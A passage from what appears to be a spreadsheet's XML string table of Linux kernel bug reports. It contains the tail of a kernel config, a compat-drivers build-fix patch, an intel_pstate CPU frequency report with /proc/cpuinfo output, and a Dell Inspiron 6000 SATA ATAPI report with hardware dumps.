CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set # CONFIG_NLS_ASCII is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # CONFIG_DLM is not set # # Kernel hacking # CONFIG_TRACE_IRQFLAGS_SUPPORT=y CONFIG_PRINTK_TIME=y # CONFIG_ENABLE_WARN_DEPRECATED is not set # CONFIG_ENABLE_MUST_CHECK is not set CONFIG_FRAME_WARN=1024 # CONFIG_MAGIC_SYSRQ is not set # CONFIG_UNUSED_SYMBOLS is not set # CONFIG_DEBUG_FS is not set # CONFIG_HEADERS_CHECK is not set # CONFIG_DEBUG_KERNEL is not set CONFIG_DEBUG_BUGVERBOSE=y # CONFIG_LATENCYTOP is not set # CONFIG_PROVIDE_OHCI1394_DMA_INIT is not set # CONFIG_SAMPLES is not set CONFIG_HAVE_ARCH_KGDB=y # CONFIG_NONPROMISC_DEVMEM is not set CONFIG_EARLY_PRINTK=y # CONFIG_4KSTACKS is not set CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y CONFIG_DOUBLEFAULT=y CONFIG_IO_DELAY_TYPE_0X80=0 CONFIG_IO_DELAY_TYPE_0XED=1 CONFIG_IO_DELAY_TYPE_UDELAY=2 CONFIG_IO_DELAY_TYPE_NONE=3 CONFIG_IO_DELAY_0X80=y # CONFIG_IO_DELAY_0XED is not set # CONFIG_IO_DELAY_UDELAY is not set # CONFIG_IO_DELAY_NONE is not set CONFIG_DEFAULT_IO_DELAY_TYPE=0 # # Security options # CONFIG_KEYS=y # CONFIG_KEYS_DEBUG_PROC_KEYS is not set CONFIG_SECURITY=y CONFIG_SECURITY_NETWORK=y CONFIG_SECURITY_CAPABILITIES=y # CONFIG_SECURITY_FILE_CAPABILITIES is not set # CONFIG_SECURITY_ROOTPLUG is not set CONFIG_SECURITY_DEFAULT_MMAP_MIN_ADDR=0 CONFIG_CRYPTO=y # # Crypto core or helper # CONFIG_CRYPTO_ALGAPI=y # CONFIG_CRYPTO_MANAGER is not set # CONFIG_CRYPTO_GF128MUL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>from: Steve Russo &lt;svrusso1@gmail.com&gt; Compiling iwlwifi or alx against 3.4.47 kernel gives redefinition error. Tried using compat-drivers-3.9-rc4-2-su, compat-drivers-3.9-rc2-2-su, and compat-drivers-3.8.3-2-snpu. Does not work from any of them. Patch against compat-drivers-3.9-rc4-2-su follows body. Error: auser@mycomputer:/path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su# make make -C /lib/modules/3.4.47/build M=/path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su modules make[1]: Entering directory `/path/to/home/Dev/Kernel/generic/linux-3.4.47' CC [M] /path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su/compat/main.o In file included from /path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su/include/linux/compat-2.6.h:71:0, from &lt;command-line&gt;:0: /path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su/include/linux/compat-3.8.h:49:32: error: redefinition of ‘kref_get_unless_zero’ In file included from include/linux/kobject.h:24:0, from include/linux/device.h:17, from include/linux/dmaengine.h:24, from include/linux/skbuff.h:31, from include/linux/if_ether.h:134, from include/linux/netdevice.h:29, from /path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su/include/linux/compat-2.6.29.h:5, from /path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su/include/linux/compat-2.6.h:52, from &lt;command-line&gt;:0: include/linux/kref.h:113:32: note: previous definition of ‘kref_get_unless_zero’ was here make[3]: *** [/path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su/compat/main.o] Error 1 make[2]: *** [/path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su/compat] Error 2 make[1]: *** [_module_/path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su] Error 2 make[1]: Leaving directory `/path/to/home/Dev/Kernel/generic/linux-3.4.47' make: *** [modules] Error 2 auser@mycomputer:/path/to/home/Dev/Wired/compat-drivers-3.9-rc4-2-su# Signed-off-by: Steve Russo &lt;svrusso1@gmail.com&gt; --- The following patch against compat-drivers-3.9-rc4-2-su allowed compilation to complete. --- compat-3.8.h.0 2013-05-30 15:57:51.333132738 -0400 +++ compat-3.8.h 2013-05-30 15:59:12.689517900 -0400 @@ -22,6 +22,7 @@ extern void netdev_set_default_ethtool_o extern bool hid_ignore(struct hid_device *); +#ifndef _KREF_H_ /* This backports: * * commit 4b20db3de8dab005b07c74161cb041db8c5ff3a7 @@ -50,6 +51,7 @@ static inline int __must_check kref_get_ { return atomic_add_unless(&amp;kref-&gt;refcount, 1, 0); } +#endif /* This backports: *</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Created attachment 107170 [details] Kernel config (3.11-rc4) The kernel used for this bug report is not a vanilla 3.11-rc4, but the one patched with https://bugzilla.kernel.org/attachment.cgi?id=106891&amp;action=diff from bug #58971. It is not possible to know whether this is a regression, because the bug (if it existed before) was effectively masked by bug #48721. To reproduce, compile a simple package (like media-libs/tiff-4.0.3-r2) on Gentoo using portage. Sometimes (but not always), during the whole process, the CPU frequency (both as reported by cpufreq-info and as reported by cat /proc/cpuinfo) doesn't raise as high as I would expect. I.e. it raises only to 1176 MHz, while I expect it to become 3.50 GHz on at least one CPU core, because the compilation process is clearly CPU bound. The driver is intel_pstate and the governor is powersave. It may be relevant that the load created by portage is nice (but there is no ignore_nice_load file in my sysfs tree), and that all of the configuration tests and gcc calls exit quickly. If the setting to ignore the nice load exists with intel_pstate but is not named ignore_nice_load, then please tell me about it - the bug may be invalid after all due to it. # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz stepping : 7 microcode : 0x28 cpu MHz : 1176.000 cache size : 4096 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid bogomips : 5587.21 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz stepping : 7 microcode : 0x28 cpu MHz : 1176.000 cache size : 4096 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid bogomips : 5587.21 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 2 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz stepping : 7 microcode : 0x28 cpu MHz : 1176.000 cache size : 4096 KB physical id : 0 siblings : 4 core id : 1 cpu cores : 2 apicid : 2 initial apicid : 2 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid bogomips : 5587.21 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 3 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz stepping : 7 microcode : 0x28 cpu MHz : 1176.000 cache size : 4096 KB physical id : 0 siblings : 4 core id : 1 cpu cores : 2 apicid : 3 initial apicid : 3 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid bogomips : 5587.21 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hardware Environment: A Dell Inspiron 6000. # lspci -vvv 0000:00:00.0 Host bridge: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller (rev 03) Subsystem: Dell: Unknown device 0188 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [e0] #09 [2109] 0000:00:01.0 PCI bridge: Intel Corporation Mobile 915GM/PM Express PCI Express Root Port (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x10 (64 bytes) Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: dfd00000-dfefffff Prefetchable memory behind bridge: d0000000-d7ffffff BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [88] #0d [0000] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Address: fee01004 Data: 40b9 Capabilities: [a0] #10 [0141] 0000:00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0188 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 169 Region 4: I/O ports at bf80 [size=32] 0000:00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0188 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 193 Region 4: I/O ports at bf60 [size=32] 0000:00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0188 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 201 Region 4: I/O ports at bf40 [size=32] 0000:00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0188 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 209 Region 4: I/O ports at bf20 [size=32] 0000:00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03) (prog-if 20 [EHCI]) Subsystem: Dell: Unknown device 0188 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 169 Region 0: Memory at ffa80800 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #0a [20a0] 0000:00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev d3) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=03, subordinate=04, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: dfc00000-dfcfffff Prefetchable memory behind bridge: 00000000fff00000-0000000000000000 BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [50] #0d [0000] 0000:00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 03) Subsystem: Dell Inspiron 6000 laptop Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 169 Region 0: I/O ports at ed00 [size=256] Region 1: I/O ports at ec40 [size=64] Region 2: Memory at dffffe00 (32-bit, non-prefetchable) [size=512] Region 3: Memory at dffffd00 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1e.3 Modem: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Modem Controller (rev 03) (prog-if 00 [Generic]) Subsystem: Conexant: Unknown device 5423 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 193 Region 0: I/O ports at ee00 [size=256] Region 1: I/O ports at ec80 [size=128] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1f.0 ISA bridge: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge (rev 03) Subsystem: Dell: Unknown device 0188 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 0000:00:1f.2 IDE interface: Intel Corporation 82801FBM (ICH6M) SATA Controller (rev 03) (prog-if 80 [Master]) Subsystem: Dell: Unknown device 0188 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 193 Region 0: I/O ports at &lt;ignored&gt; Region 1: I/O ports at &lt;ignored&gt; Region 2: I/O ports at &lt;ignored&gt; Region 3: I/O ports at &lt;ignored&gt; Region 4: I/O ports at bfa0 [size=16] Capabilities: [70] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03) Subsystem: Dell: Unknown device 0188 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 10 Region 4: I/O ports at 10c0 [size=32] 0000:01:00.0 VGA compatible controller: ATI Technologies Inc M22 [Radeon Mobility M300] (prog-if 00 [VGA]) Subsystem: Dell: Unknown device 2003 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x10 (64 bytes) Interrupt: pin A routed to IRQ 169 Region 0: Memory at d0000000 (32-bit, prefetchable) [size=128M] Region 1: I/O ports at de00 [size=256] Region 2: Memory at dfdf0000 (32-bit, non-prefetchable) [size=64K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #10 [0001] Capabilities: [80] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 0000:03:00.0 Ethernet controller: Broadcom Corporation BCM4401-B0 100Base-TX (rev 02) Subsystem: Dell Inspiron 6000 laptop Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Interrupt: pin A routed to IRQ 201 Region 0: Memory at dfcfe000 (32-bit, non-prefetchable) [size=8K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- 0000:03:01.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev b3) Subsystem: Dell Inspiron 6000 laptop Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168 Interrupt: pin A routed to IRQ 209 Region 0: Memory at 40000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=03, secondary=04, subordinate=07, sec-latency=176 Memory window 0: 40400000-407ff000 (prefetchable) Memory window 1: 40800000-40bff000 I/O window 0: 00004000-000040ff I/O window 1: 00004400-000044ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 0000:03:01.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller (rev 08) (prog-if 10 [OHCI]) Subsystem: Dell: Unknown device 0188 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (500ns min, 1000ns max) Interrupt: pin B routed to IRQ 201 Region 0: Memory at dfcfc800 (32-bit, non-prefetchable) [size=2K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME+ 0000:03:01.2 0805: Ricoh Co Ltd SD Card reader (rev 17) (prog-if 01) Subsystem: Dell Inspiron 6000 laptop Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Interrupt: pin C routed to IRQ 10 Region 0: Memory at dfcfc700 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- 0000:03:03.0 Network controller: Intel Corporation PRO/Wireless 2915ABG MiniPCI Adapter (rev 05) Subsystem: Intel Corporation: Unknown device 1021 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (750ns min, 6000ns max), Cache Line Size: 0x10 (64 bytes) Interrupt: pin A routed to IRQ 193 Region 0: Memory at dfcfd000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- # cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: FUJITSU MHV2080A Rev: 0000 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi1 Channel: 00 Id: 00 Lun: 00 Vendor: SONY Model: DVD+-RW DW-D56A Rev: PDS3 Type: CD-ROM ANSI SCSI revision: 05 # cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : libata 01f0-01f7 : libata 03c0-03df : vga+ 03c0-03df : vesafb 04d0-04d1 : pnp 00:01 0900-090f : pnp 00:07 0910-091f : pnp 00:07 0920-092f : pnp 00:07 0930-093f : pnp 00:07 0940-097f : pnp 00:07 1000-1005 : motherboard 1000-1003 : PM1a_EVT_BLK 1004-1005 : PM1a_CNT_BLK 1006-1007 : motherboard 1006-1007 : pnp 00:02 1008-100f : motherboard 1008-100b : PM_TMR 1020-1020 : PM2_CNT_BLK 1028-102f : GPE0_BLK 1060-107f : motherboard 1060-107f : pnp 00:02 1080-10bf : motherboard 1080-10bf : pnp 00:02 10c0-10df : 0000:00:1f.3 10c0-10df : motherboard 10c0-10df : pnp 00:02 10c0-10c7 : i801-smbus 10e0-10ff : motherboard 10e0-10e5 : ACPI CPU throttle 4000-40ff : PCI CardBus #04 4400-44ff : PCI CardBus #04 bf20-bf3f : 0000:00:1d.3 bf20-bf3f : uhci_hcd bf40-bf5f : 0000:00:1d.2 bf40-bf5f : uhci_hcd bf60-bf7f : 0000:00:1d.1 bf60-bf7f : uhci_hcd bf80-bf9f : 0000:00:1d.0 bf80-bf9f : uhci_hcd bfa0-bfaf : 0000:00:1f.2 bfa0-bfaf : libata d000-dfff : PCI Bus #01 de00-deff : 0000:01:00.0 ec40-ec7f : 0000:00:1e.2 ec40-ec7f : Intel ICH6 ec80-ecff : 0000:00:1e.3 ec80-ecff : Intel ICH Modem ed00-edff : 0000:00:1e.2 ed00-edff : Intel ICH6 ee00-eeff : 0000:00:1e.3 ee00-eeff : Intel ICH Modem f400-f4fe : motherboard f400-f4fe : pnp 00:02 # cat /proc/iomem 00000000-0009efff : System RAM 0009f000-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cffff : Video ROM 000f0000-000fffff : System ROM 00100000-3ffd37ff : System RAM 00100000-0030e64e : Kernel code 0030e64f-003e76ff : Kernel data 3ffd3800-3fffffff : reserved 40000000-40000fff : 0000:03:01.0 40000000-40000fff : yenta_socket 40400000-407fffff : PCI CardBus #04 40800000-40bfffff : PCI CardBus #04 d0000000-d7ffffff : PCI Bus #01 d0000000-d7ffffff : 0000:01:00.0 d0000000-d7ffffff : vesafb dfcfc700-dfcfc7ff : 0000:03:01.2 dfcfc800-dfcfcfff : 0000:03:01.1 dfcfc800-dfcfcfff : ohci1394 dfcfd000-dfcfdfff : 0000:03:03.0 dfcfd000-dfcfdfff : ipw2200 dfcfe000-dfcfffff : 0000:03:00.0 dfcfe000-dfcfffff : b44 dfd00000-dfefffff : PCI Bus #01 dfdf0000-dfdfffff : 0000:01:00.0 dffffd00-dffffdff : 0000:00:1e.2 dffffd00-dffffdff : Intel ICH6 dffffe00-dfffffff : 0000:00:1e.2 dffffe00-dfffffff : Intel ICH6 e0000000-f0006fff : reserved f0008000-f000bfff : reserved fec00000-fec0ffff : reserved fed20000-fee0ffff : reserved ffa80800-ffa80bff : 0000:00:1d.7 ffa80800-ffa80bff : ehci_hcd ffb00000-ffffffff : reserved # uname -r 2.6.12.1.custom.1.1 Problem Description: To make the cd/dvd drive/burner work at all, you have to enable SATA ATAPI by changing #undef ATA_ENABLE_ATAPI to #define ATA_ENABLE_ATAPI in include/linux/libata.h. Without doing that, you won't even be able to read from the drive. This has worked very well on my system, I get good speeds when reading from the cd and have burned an error free cd at minimum 12x, average 17x and maximum 24x (which is the theoretical maximum burning speed). I've heard that this needs to be done on some others of Dell's newest laptops, and it should be needed on every laptop that has the 915GM chipset and the ICH6M sata controller. Therefore I propose that this should be enabled in future uptream kernels by default, even though I've read that support for SATA ATAPI is not complete. Though if it has been reported that this breaks completely on some systems, ie kernel-panics or similar, it should of course not be enabled. If it just works for some but doesn't work for others, but doesn't break anything, it can IMO be included. I did not find any bug stating so in the bugzilla. I have checked so that this haven't been changed in the changelogs for 2.6.12.2 to 2.6.12.3 and 2.6.13-rc1 to 2.6.13-rc4. Regards, Alexander Toresson</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
